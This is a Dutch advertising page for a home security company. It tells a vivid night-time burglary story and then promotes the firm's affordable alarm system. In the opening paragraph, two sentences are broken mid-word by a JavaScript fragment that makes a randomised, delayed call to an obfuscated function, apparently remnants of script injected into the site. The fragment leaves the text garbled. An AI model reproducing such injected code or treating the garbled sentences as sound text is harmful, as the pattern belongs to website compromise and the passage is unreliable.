Veiligheid voor iedereen!

Veiligheid voor iedereen

Het is half drie ’s nachts. Uw gezin ligt heerlijk te slapen. Opeens schrikt u wakker: ik hoor iets!! Loopt er iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in huis? Is er iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and bij de kinderen? U hoort een deur dichtslaan. Uw hart klopt in uw keel…heel voorzichtig gaat u uw bed uit. Uw vrouw wordt wakker en vraagt wat er is. “Sssstt!”, fluistert u. “Volgens mij hoorde ik iets beneden”.

Ingebroken! Er is ingebroken

U loopt heel voorzichtig de trap af en luistert goed. U hoort niets, maar doet het licht aan. Wat u dan ziet geeft u koude rillingen: open kasten, de laden van het dressoir, allemaal open en de inhoud ligt op de grond. “Wat is hier gebeurd?”, denkt u en tegelijkertijd weet u het antwoord op de vraag: “Ingebroken! Er is ingebroken”, denkt u.

U controleert meteen of er wat weg is. Ja hoor: de Ipad, de fotocamera, uw portemonnee met geld, pasjes en uw rijbewijs, de spaarpotjes van de kinderen…allemaal weg! En het doosje met het collier van de grootmoeder van uw vrouw. Dat mooie erfstuk dat zoveel voor haar betekende: ook weg! De sleutel van uw nieuwe auto ligt gelukkig nog op tafel.

De impact

Ondertussen is uw vrouw ook beneden gekomen. Als ze de ravage ziet begint ze te huilen. “Verschrikkelijk, wat verschrikkelijk!” zegt ze. U bedenkt zich dat u de politie moet bellen. Nadat u het verhaal heeft uitgelegd en er een surveillanceauto onderweg is, realiseert u zich dat het maar goed is dat de kinderen niet wakker zijn geworden en dat u de inbrekers niet bent tegengekomen.

Inbraak, geen uitzondering

Woninginbraak! Het is aan de orde van de dag en zorgt ervoor dat steeds meer mensen zich niet meer veilig voelen in hun eigen huis. Hun eigen huis, hun eigen plekje. Niet meer veilig. De gevolgen zijn vaak nog jaren na de inbraak “voelbaar”. De angst regeert! Bange kinderen die bij elk geluid wakker schrikken.

Wij maken het helaas regelmatig mee. Iedere burger heeft recht op een veilige plek. Dat vinden wij! Vanuit deze gedachte heeft de Correct Groep samen met een vaste partner een eigen beveiligingsconcept ontwikkeld. Wat hierbij vooral centraal stond was betrouwbaarheid en gebruiksvriendelijkheid van het systeem. Tevens vonden wij het belangrijk om de kosten zo gunstig mogelijk te houden, zonder concessies te doen aan de betrouwbaarheid. Zoals gezegd vinden wij dat een betrouwbare beveiliging voor eenieder bereikbaar moet zijn. Een veilige woon- en werkplek voor iedereen, dat vinden wij…